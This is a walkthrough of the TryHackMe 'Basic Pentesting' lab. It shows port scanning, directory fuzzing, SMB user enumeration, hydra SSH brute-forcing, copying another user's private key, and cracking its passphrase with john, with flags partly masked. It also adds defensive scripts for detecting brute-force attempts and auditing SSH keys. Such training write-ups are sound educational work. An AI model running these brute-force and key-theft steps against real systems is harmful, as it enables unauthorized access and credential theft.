Solving Basic Pentesting – TryHackMe Challenge Writeup



This post provides a full walkthrough of the TryHackMe challenge called Basic Pentesting. We will scan open ports, enumerate the web app directories, retrieve SMB usernames, brute-force SSH access, and finally brute-force the passphrase of another user's SSH private key for the privilege escalation.


Introduction – Basic Pentesting

According to the TryHackMe description, Basic Pentesting is a challenge that allows us to “practise web app hacking and privilege escalation”.

We are going to learn brute forcing, hash cracking, service enumeration and Linux enumeration.

The room is guided: we have to answer 8 different questions, from the initial enumeration to the privilege escalation.

It’s an easy challenge, so let’s get started!

We are going to solve it question by question.


Find the services exposed by the machine

OK, so let’s start with the usual nmap scan:

nmap -sS -T5 -p- -Pn --disable-arp-ping 10.80.136.170
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

nmap options:

  • -sS: TCP SYN (half-open) scan
  • -T5: the most aggressive (“insane”) timing template, which caps the scan delay at 5ms per probe
  • -p-: scans all ports (from 1 to 65535)
  • -Pn --disable-arp-ping: skips host discovery (the ICMP and ARP probes nmap sends by default) and treats the target as up

So 3 different services are detected: SSH, HTTP and SMB (ports 139 and 445).

Well, that’s all for the first question. Let’s switch to the website enumeration.


What is the name of the hidden directory on the web server?

For this question, we are going to enumerate (brute force) the directories of the web app.

Let’s use ffuf for this task, it’s a fast and versatile tool:

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u "http://10.80.136.170/FUZZ" -mc all -fc 404 -r -ic -s
.hta
.htaccess
.htpasswd
de*********
index.html
server-status

ffuf options:

  • -w: wordlist used
  • -u: target URL
  • -mc all -fc 404: keeps all responses except for 404 NOT FOUND
  • -r: follows redirections
  • -ic: ignores comments in the wordlist
  • -s: silent mode

The hidden directory is de********* (hidden so you have to do it yourself and learn!)


User brute-forcing to find the username & password

Our next task is to retrieve a username and password through brute-forcing.

We have the choice between SMB and SSH services, and we are going to choose SMB as we can probably enumerate users.

Let’s enumerate the SMB service using enum4linux:

enum4linux -a 10.80.136.170
[...]
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)

Ok, so 3 local users were retrieved: kay, jan and ubuntu.

Let’s have a look at the next 2 questions:

What is the username? What is the password?

The username answer syntax is ***, so the valid username must be 3 characters long. It’s either kay or jan.

The password syntax is *******, so the valid password must be 7 characters long. Let’s extract all the 7-character-long passwords from a password wordlist:

grep -oE '\b.{7}\b' /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt > /tmp/passwords

grep options:

  • -o: only prints the part of each line that matches the regular expression
  • -E: interprets the pattern as an extended regular expression
  • '\b.{7}\b': any run of exactly 7 characters between 2 word boundaries

So our potential passwords are stored in /tmp/passwords and the usernames are either kay or jan.

With this knowledge, we are able to brute-force the SSH service using hydra:

hydra -l jan -P /tmp/passwords ssh://10.80.136.170/
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-11 08:35:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1771 login tries (l:1/p:1771), ~111 tries per task
[DATA] attacking ssh://10.80.136.170:22/
[STATUS] 168.00 tries/min, 168 tries in 00:01h, 1609 to do in 00:10h, 16 active
[STATUS] 114.00 tries/min, 342 tries in 00:03h, 1435 to do in 00:13h, 16 active
[STATUS] 106.71 tries/min, 747 tries in 00:07h, 1030 to do in 00:10h, 16 active
[STATUS] 108.50 tries/min, 1302 tries in 00:12h, 475 to do in 00:05h, 16 active
[22][ssh] host: 10.80.136.170   login: jan   password: arm****

hydra options:

  • -l: login to use
  • -P: passwords wordlist to use

Nice! After roughly 15 minutes, the credentials are found: the username is jan and password is arm**** (I challenge you to find it!).

I launched the command with jan; it was a coin toss 😉

So we know both the username and the password. Let’s switch to the next questions, shall we?
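From the defender's side, a hydra run like the one above is loud: every guess lands in the target's auth log as a sshd “Failed password” line from the same source, and the guess that works is followed by an “Accepted password” line from that source. The script below is an added example (not part of the original writeup) of the corresponding detection logic: it parses sshd auth-log lines, flags any source address with a burst of failures inside a time window, and records whether a successful login from that address followed the burst. The log excerpt is constructed for the example; the attacking address 10.80.146.197 and the 2026-02-11 08:35 start time are taken from the scp and hydra transcripts on this page, the hostname and PIDs are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd's auth.log lines use syslog format, which carries no year, so the caller supplies it.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)


def parse_line(line, year=2026):
    """Return (timestamp, result, user, source_ip) for an sshd auth line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60), year=2026):
    """Flag source IPs with >= threshold failed logins inside one window.

    For each flagged IP the report also records whether an accepted login from the
    same IP followed the burst, which is the signature of a guess that succeeded.
    """
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line, year)
        if parsed:
            events[parsed[3]].append(parsed[:3])

    report = {}
    for ip, evs in events.items():
        evs.sort()
        failures = [ts for ts, result, _ in evs if result == "Failed"]
        burst_at = None
        start = 0
        for end, ts in enumerate(failures):
            # Slide the window start forward until the span is at most `window` long.
            while ts - failures[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_at = ts
                break
        if burst_at is None:
            continue
        success_after = next(
            (user for ts, result, user in evs if result == "Accepted" and ts >= burst_at), None
        )
        report[ip] = {"failures": len(failures), "burst_at": burst_at, "success_after_burst": success_after}
    return report


def constructed_sample_log():
    """Constructed auth.log excerpt (not captured from the lab): a 15-guess burst from the
    attacking box that ends in a successful login, plus one unrelated typo and a key-based login."""
    host = "ip-10-80-136-170"
    lines = []
    for i in range(15):
        t = datetime(2026, 2, 11, 8, 35, 1) + timedelta(seconds=3 * i)
        lines.append(f"{t:%b %d %H:%M:%S} {host} sshd[{2000 + i}]: Failed password for jan "
                     f"from 10.80.146.197 port {51000 + i} ssh2")
    lines.append(f"Feb 11 08:35:50 {host} sshd[2100]: Accepted password for jan from 10.80.146.197 port 51100 ssh2")
    lines.append(f"Feb 11 08:40:02 {host} sshd[2200]: Failed password for invalid user admin from 10.80.1.5 port 40000 ssh2")
    lines.append(f"Feb 11 08:40:09 {host} sshd[2201]: Accepted publickey for ubuntu from 10.80.1.5 port 40001 ssh2")
    return lines


if __name__ == "__main__":
    for ip, info in detect_bruteforce(constructed_sample_log()).items():
        print(f"{ip}: {info['failures']} failures, burst at {info['burst_at']:%H:%M:%S}, "
              f"login accepted afterwards for: {info['success_after_burst']}")
```

The threshold and window are deliberately low here so the constructed sample trips them; on a real host they are tuned to the normal failure rate, and the single mistyped login from 10.80.1.5 correctly stays below the bar. The “accepted after burst” field is the one worth paging on, since it separates a noisy scanner from a compromised account.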


What service do you use to access the server (answer in abbreviation in all caps)?

Well, the service we use to access the server is SSH. I can’t really hide this answer from you 😉

Let’s go directly to privilege escalation.


Enumerate the machine to find any vectors for privilege escalation

OK, so first things first, we have to log in through SSH to the target with the jan account:

ssh jan@10.80.136.170

Now, it’s time to enumerate.


Readable SSH private key

We quickly find a readable SSH private key in the home directory of the other user kay:

jan@ip-10-80-136-170:~$ cd /home/kay
jan@ip-10-80-136-170:/home/kay$ ls -lA
total 40
-rw------- 1 kay  kay  789 Jun 22  2025 .bash_history
-rw-r--r-- 1 kay  kay  220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay 3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay 4096 Apr 17  2018 .cache
-rw------- 1 root kay  119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay 4096 Apr 23  2018 .nano
-rw------- 1 kay  kay   57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay  655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay 4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay    0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay  538 Apr 23  2018 .viminfo
jan@ip-10-80-136-170:/home/kay$ cd .ssh
jan@ip-10-80-136-170:/home/kay/.ssh$ ls -lA
total 12
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

This is very bad: anyone who can read the SSH private key can log in as kay to the system without providing a password (unless the private key is protected by a passphrase).
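The two properties that made this key dangerous, world-readable permissions and (as we will see) a weak passphrase, are both checkable without touching the key material. The script below is an added example, not part of the original writeup, of an audit a defender can run over /home: it flags private keys whose mode allows group or other access, and keys stored without any passphrase. For legacy PEM keys an encrypted file carries a “Proc-Type: 4,ENCRYPTED” header; for the newer openssh-key-v1 format the cipher name in the blob header is “none” for an unprotected key. The helper names, the sample users alice and bob, and the placeholder key bodies are constructed for the example; the “kay” fixture reproduces the 0644 mode seen in the ls output above.

```python
import base64
import os
import stat
import struct
import sys
import tempfile
from pathlib import Path

PRIVATE_KEY_NAMES = ("id_rsa", "id_dsa", "id_ecdsa", "id_ed25519")
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def key_is_encrypted(data: bytes) -> bool:
    """True if the private key needs a passphrase; handles legacy PEM and openssh-key-v1 files."""
    text = data.decode("ascii", errors="replace")
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(l for l in text.splitlines() if l and not l.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("malformed openssh-key-v1 blob")
        # Header layout: magic, string ciphername, string kdfname, string kdfoptions, uint32 nkeys.
        off = len(OPENSSH_MAGIC)
        (n,) = struct.unpack(">I", blob[off:off + 4])
        ciphername = blob[off + 4:off + 4 + n]
        return ciphername != b"none"
    # Legacy PEM (RSA/DSA/EC): an encrypted key carries a Proc-Type header before the body.
    return "Proc-Type: 4,ENCRYPTED" in text


def audit_key(path: Path) -> list:
    """Report a private key that is readable by others or stored without a passphrase."""
    findings = []
    mode = stat.S_IMODE(path.stat().st_mode)
    if mode & 0o077:
        findings.append(f"{path}: mode {mode:04o} is readable by group/others (expected 0600)")
    if not key_is_encrypted(path.read_bytes()):
        findings.append(f"{path}: no passphrase, so a copy of the file is enough to log in")
    return findings


def audit_home_dirs(root: Path) -> list:
    """Walk <root>/<user>/.ssh for the standard key file names and audit each one."""
    findings = []
    for home in sorted(p for p in root.iterdir() if p.is_dir()):
        for name in PRIVATE_KEY_NAMES:
            key = home / ".ssh" / name
            try:
                if key.is_file():
                    findings.extend(audit_key(key))
            except OSError as exc:  # e.g. not running as root over another user's home
                findings.append(f"{key}: skipped ({exc.strerror})")
    return findings


# --- constructed fixtures (placeholder bodies, no real key material) -------------------------
def build_openssh_key(ciphername: bytes, kdfname: bytes) -> bytes:
    """Constructed openssh-key-v1 header only; enough for key_is_encrypted(), not a usable key."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    blob = OPENSSH_MAGIC + s(ciphername) + s(kdfname) + s(b"") + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n".encode()

UNENCRYPTED_PEM = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                   b"Q09OU1RSVUNURUQgUExBQ0VIT0xERVI=\n"
                   b"-----END RSA PRIVATE KEY-----\n")
ENCRYPTED_PEM = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                 b"Proc-Type: 4,ENCRYPTED\n"
                 b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                 b"Q09OU1RSVUNURUQgUExBQ0VIT0xERVI=\n"
                 b"-----END RSA PRIVATE KEY-----\n")


def demo() -> list:
    """Build a throwaway /home lookalike and audit it; 'kay' mirrors the world-readable key on the box."""
    root = Path(tempfile.mkdtemp())
    fixtures = {
        "kay": (build_openssh_key(b"aes256-ctr", b"bcrypt"), 0o644),  # passphrase, but world-readable
        "alice": (UNENCRYPTED_PEM, 0o600),                            # right mode, no passphrase
        "bob": (ENCRYPTED_PEM, 0o600),                                # clean
    }
    for user, (data, mode) in fixtures.items():
        ssh_dir = root / user / ".ssh"
        ssh_dir.mkdir(parents=True)
        key = ssh_dir / "id_rsa"
        key.write_bytes(data)
        os.chmod(key, mode)
    return audit_home_dirs(root)


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    for finding in (audit_home_dirs(target) if target else demo()):
        print(finding)
```

Run with no argument it audits the constructed fixtures; run as root with /home as the argument it audits the real machine. A key that passes both checks can still have a guessable passphrase, which is exactly what the next section exploits, so the file-mode finding is the one to fix first: a key nobody else can read cannot be cracked offline.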

Let’s copy this private key to our machine using scp:

root@ip-10-80-146-197:~# scp jan@10.80.136.170:/home/kay/.ssh/id_rsa /tmp/id_rsa
jan@10.80.136.170's password: 
id_rsa                                        100% 3326     4.3MB/s   00:00    
root@ip-10-80-146-197:~# chmod 600 /tmp/id_rsa

Now, let’s try to log in with this private key:

root@ip-10-80-146-197:~# ssh -i /tmp/id_rsa kay@10.80.136.170
Enter passphrase for key '/tmp/id_rsa':

Oops, the private key is protected by a password. Whatever, we can try to brute-force it!


Cracking the SSH private key

To get a format that john understands, we first convert the private key into a hash with ssh2john, a helper script that ships with john:

root@ip-10-80-146-197:~# python3 /opt/john/ssh2john.py /tmp/id_rsa > /tmp/id_rsa.hash

Now, we can launch john with the default wordlist rockyou.txt and the previous hash:

# john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/id_rsa.hash
[...]
be*****          (/tmp/id_rsa)

Great, the password was very quickly found!

We are now able to connect to the target with the kay account using the command ssh -i /tmp/id_rsa kay@10.80.136.170 and providing this password.


What is the name of the other user you found (all lower case)?

Before moving on to the final question, the answer to this one is obviously kay.


What is the final password you obtain?

Once we are connected as kay on the target, we can read a clear password in the home directory:

kay@ip-10-80-136-170:~$ ls -lA
total 40
-rw------- 1 kay  kay  789 Jun 22  2025 .bash_history
-rw-r--r-- 1 kay  kay  220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay 3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay 4096 Apr 17  2018 .cache
-rw------- 1 root kay  119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay 4096 Apr 23  2018 .nano
-rw------- 1 kay  kay   57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay  655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay 4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay    0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay  538 Apr 23  2018 .viminfo
kay@ip-10-80-136-170:~$ cat pass.bak
heresareallystrongpass************************************

The final password we obtain is heresareallystrongpass******************************.

That’s the end of the challenge!


Final Thoughts – Basic Pentesting

This was a fun challenge, involving port scan, enumeration and brute-forcing, on 3 different services.

I encourage you to solve it yourself and only look at my writeups when you are stuck.

Flags are hidden (for the most part), it’s not to be annoying but to encourage you into learning and becoming better.

Read more THM Writeups on pentestguides.com:


Disclaimer

This article is provided for educational purposes only.

All techniques demonstrated were performed in a controlled lab environment.

Do not attempt to reproduce these actions on systems you do not own or have explicit authorization to test.

I do not encourage or take responsibility for any illegal use of the information provided.
